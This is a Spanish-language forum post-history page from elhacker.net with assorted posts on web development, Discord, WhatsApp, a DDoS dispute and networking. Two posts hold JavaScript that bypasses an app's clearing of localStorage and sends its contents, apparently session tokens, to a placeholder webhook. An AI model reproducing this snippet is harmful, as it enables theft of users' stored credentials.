elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 31
1  Programación / Desarrollo Web / Re: Enviar localstorage mediante webhook desde la consola, error 404 ¿? en: 11 Junio 2021, 10:55 am
Actualizo: Ya lo pude resolver, simplemente pasando el parametro exacto a buscar en LocalStorage funciona sin problemas:


Código
  1. //cambiar:
  2. var msg = LocalStorage;
  3. //por:
  4. var msg = LocalStorage.getItem('valor');
  5. //Al parecer al justificar exactamente que quieres enviar lo hace sin problemas.
  6.  

Saludos.
2  Programación / Desarrollo Web / Enviar localstorage mediante webhook desde la consola, error 404 ¿? en: 11 Junio 2021, 10:37 am
Hola.

Estuve informandome acerca del funcionamiento de LocalStorage, siempre me maneje más por el lado de las cookies y estoy obteniendo un error al intentar enviar mediante una webhook desde la consola un valor del mencionado almacenador de información;

Código
  1. function getLocalStoragePropertyDescriptor() {
  2.  const iframe = document.createElement('iframe');
  3.  document.head.append(iframe);
  4.  const pd = Object.getOwnPropertyDescriptor(iframe.contentWindow, 'localStorage');
  5.  iframe.remove();
  6.  return pd;
  7. }
  8.  
  9. Object.defineProperty(window, 'localStorage', getLocalStoragePropertyDescriptor());
  10. const localStorage = getLocalStoragePropertyDescriptor().get.call(window);
  11.  
  12.  

La aplicación al iniciarse limpia y no permite de alguna forma acceder a LocalStorage, por lo tanto utilice esa función que encontré navegando para poder acceder al LocalStorage.

Para corroborar que la función mencionada este en correcto funcionamiento hice una simple impresión desde la consola con:

Código
  1. console.log(LocalStorage);
  2.  

Esto devuelve lo buscado sin ningún problema, por lo tanto la función getLocalStoragePropertyDescriptor está bien.

Luego de eso, intente desde la misma consola poder enviar un webhook, esto funciona correctamente, pero al pasar el contenido de "LocalStorage" a una variable para ser enviado, recibo el error 404.
Este es el código;

Código
  1. function enviarhook() {
  2.      var request = new XMLHttpRequest();
  3.      request.open("POST", "direcciondelhook");
  4.  
  5.      request.setRequestHeader('Content-type', 'application/json');
  6.  
  7.      var msg = LocalStorage; //Linea que causa el error, msg es el contenido que sera enviado mediante POST al webhook. Si en vez de "LocalStorage" le atribuyo cualquier otro contenido, se envia correctamente, pero en cambio si esta tal cual lo presente aqui, recibo un error 400 "POST".
  8.  
  9.      var params = {
  10.        content: msg
  11.      }
  12.  
  13.      request.send(JSON.stringify(params));
  14.    }
  15.  

Quizás esto está prohibido por un tema de seguridad, pero puede ser que este empleando algo mal por lo tanto realizo el post aquí.

La pregunta es; ¿Cuál es el causante del error?

Saludos.
3  Seguridad Informática / Seguridad / Re: Oferta de Trabajo: Mercadona buscar un hacker - Pentester - Red Team en: 10 Junio 2021, 10:55 am
Lo que creo que tendría que hacer Mercadona y cualquier otra empresa es encargar a una empresa externa que se dedique a ello para hacer una auditoría de seguridad. Saldrá quizás más caro, pero los resultado serán mas buenos.

Una sola persona no es suficiente para hacer hacer una prueba de pentesting, aunque entiendo según leo en la oferta, que que la persona se unirá a un equipo de más personas...
Exactamente, eso es algo más eficaz, HackerOne o similares donde das la posibilidad de protección a cambio de un dinerillo, que en este caso en particular para Mercadona, es un vuelto.

Es más bien una inversión que un gasto.

Siempre me pregunté si la información detallada en la aplicación web de la mencionada organización es real, es un delirio la cantidad de vulnerabilidades con las que contaban varias multinacionales y los millones que se ahorraron por haber parchado sus errores a tiempo antes de un ataque.
4  Foros Generales / Dudas Generales / Re: Pregunta en: 9 Junio 2021, 10:45 am
Hola.

Coincido con @el-brujo, no se entiende bien tu pregunta, no está bien redactada.

En Discord no puedes ver tu propia IP, así que si alguien accede a tu cuenta si se las prestaste, no podrá visualizarla.

En el correo sea falso o verdadero, si la persona crea el mismo o accede de alguna u otra forma y tu intentas acceder, puede ser que el envió de mensaje de advertencia de entrada, muestre tu dirección IP.

Ese es el sistema de validación de Discord, si se intenta loguear en tu cuenta desde un acceso "desconocido", tendrás que validar la IP (qué se ve en el mensaje enviado por Discord).

Mediante Discord por lo que se tiene conocimiento publico (quizás existe un 0day, nunca se sabe), no es posible que obtengan tu dirección IP a menos que descargues algo o entres a alguna dirección web compartida por otro usuario.

Saludos.
5  Foros Generales / Dudas Generales / Re: ¿Cómo puedo eliminar una conversación de WhatsApp y no dejar rastro de ella? en: 8 Junio 2021, 08:29 am
Hola.

Hace poco preguntaron lo mismo y le dieron varias respuestas, utilizar la opción buscar del foro antes de re-postear lo mismo.

Por otra parte, hiciste como 5 posts con la misma pregunta, te advertirán.

Saludos.
6  Foros Generales / Foro Libre / Re: ¿Qué paso con "Netzeek"? en: 8 Junio 2021, 00:39 am
Hola.

Si has leído un poco sobre el tema verás que se dedicó a eliminar a la competencia, haciendo ataques DDoS a otros servidores. Eso muy legal no es. El problema es que era algo más complicado de demostrar y casi ninguna otra empresa afectada (que yo sepa) denunció.

Sí, conocía esa parte de la historia, pero realmente los usuarios de su servidor son quienes le dan el poder y dinero más allá de los ataques.

Hace unos días en mi país se hizo conocida una noticia acerca de un muchacho que fue detenido bajo el delito de narcotrafico.
Dos vehículos de alta gama del apresado fueron secuestrados y puestos a disposición para las fuerzas policiales.
Utilizaron uno de los dos vehículos en un operativo y el auto terminó destrozado.
Se terminó demostrando que el vehículo no tenía nada que ver con el dinero del narcotráfico, por lo tanto debían restaurarselo, y ahora las fuerzas bonaerenses se metieron en un embrollo.

URL de la noticia: https://www.infobae.com/politica/2021/06/02/la-policia-bonaerense-debera-devolverles-a-narcos-dos-autos-de-alta-gama-que-son-utilizados-como-patrulleros/

A lo que voy; aunque él haya atacado anteriormente otros servidores, lo que generó con "Fenixzone" es completamente legal, los usuarios son libres de invertir su dinero en un juego.

Jugar a ser detectives es una de las diversiones de internet,  lo mejor que puedes hacer por internet , se llama técnica OSINT y es una de las más funcionan.

A mi directamente no me afecta, pero si has sufrido ataques DDoS sabes lo que es y sientes algo de empatía por las personas que si lo han padecido. Si todo el mundo se dedicara a hacer ataques DDoS a la competencia ¿en que mundo vivimos?

Entiendo perfectamente que personas se dediquen a utilizar OSINT u otras técnicas para dar con una persona en internet, a lo que iba es que la mayoría de los que intentan "desenmascarar" a nzk son usuarios de su propia comunidad, o personas que no tienen literalmente nada que ver con él.
Y considerando como anteriormente nzk actuó en contra de personas que atacaron su servidor o fueron en contra de él de alguna forma, lo más inteligente es no relacionarse y si hay algún problema realizar una denuncia.

Hoy en día es mucho más fácil realizar denunciar a alguien por un delito informático en Argentina, lo mejor que se podría hacer en caso de algún problema es acudir a ellos sin intentar hacer nada para "defenderte y contratacar" (lo recomienda el mismo gobierno por una cuestión ética en un apartado).

Denunciar un delito informático (página del gobierno argentino).

Saludos.
7  Foros Generales / Foro Libre / Re: ¿Qué paso con "Netzeek"? en: 7 Junio 2021, 19:47 pm
A mí ese tipo nunca me ha gustado, encima vive de dinero que le dan chavales a cambio de tener bienes virtuales en su basura de servidor del GTA SAMP.

Ese tío aún sigue haciendo de las suyas al parecer, solo que ahora se esconde mejor. Nunca me ha gustado ese tío, ojalá lo trinquen un buen día y le confisquen todo.

¿Alguien tiene idea de si este registro whois que circulaba por ahí es real? Lo que no me cuadra es que tanto rollo y no tenía la protección del whois en un dominio que era de el.
Hola.

No entiendo realmente cual es el problema de vivir con dinero que le dan a cambió de un producto/servicio que está ofreciendo en internet, eso que hace es legal.

En cuanto a lo del whois, está claro que no es él, coincido con @el-brujo.

Por otra parte, yo creo que lo peor que pueden hacer es jugar a ser detectives para ver quien es, se nota que tienen mucho tiempo libre... Tendrían que dejar eso de lado porque la mayoría que opina al respecto no tiene nada que ver con él, simplemente lo hacen para meterse en un embrollo sin sentido alguno.
En resumen un consejo; si no te afecta directamente, no hay que meterse, la vida es más tranquila con menos problemas.


Saludos.
8  Foros Generales / Foro Libre / Re: Narcotraficantes en el Gobierno en: 7 Junio 2021, 03:13 am
Hola.

Nada nuevo la verdad, en mi país varios gobernadores e intendentes fueron condenados bajo cargos por narcotrafico.
Hacen lo que Pablo Escobar quería hacer y no pudo, estar en el gobierno para pasar desapercibidos con un respaldo.
Así es en todo el mundo, lamentable.

Saludos.
9  Comunicaciones / Redes / Re: Que es mejor wifi o fibra? en: 6 Junio 2021, 14:29 pm
Hola.

Fibra tiene mayor velocidad, me sorprende la cantidad de postss que abriste en un día para tus peculiares preguntas.

Saludos.
10  Programación / Desarrollo Web / Re: error al crear token en la api de google drive en: 3 Junio 2021, 11:26 am
Coloque el proyecto en mi servidor local y sin problema me trabaja pero cuando lo coloco en el servidor en de producción me produce el siguiente error:

Código:

Server Error
403
Forbidden
You do not have permission to access this document.


Hola.

Al indicar que en local te funciona bien, y que el error es el HTTP: 403 en el servidor de producción, es más que seguro que los privilegios/permisos del archivo estén causando que no puedas acceder al mismo.
Tendrías que revisar los privilegios de la carpeta/archivo y posteriormente htaccess si es que tienes alguna regla definida.
El error 403 justamente es causado por eso, jerarquías de los archivos, permisos mal definidos.

Saludos.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 31
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines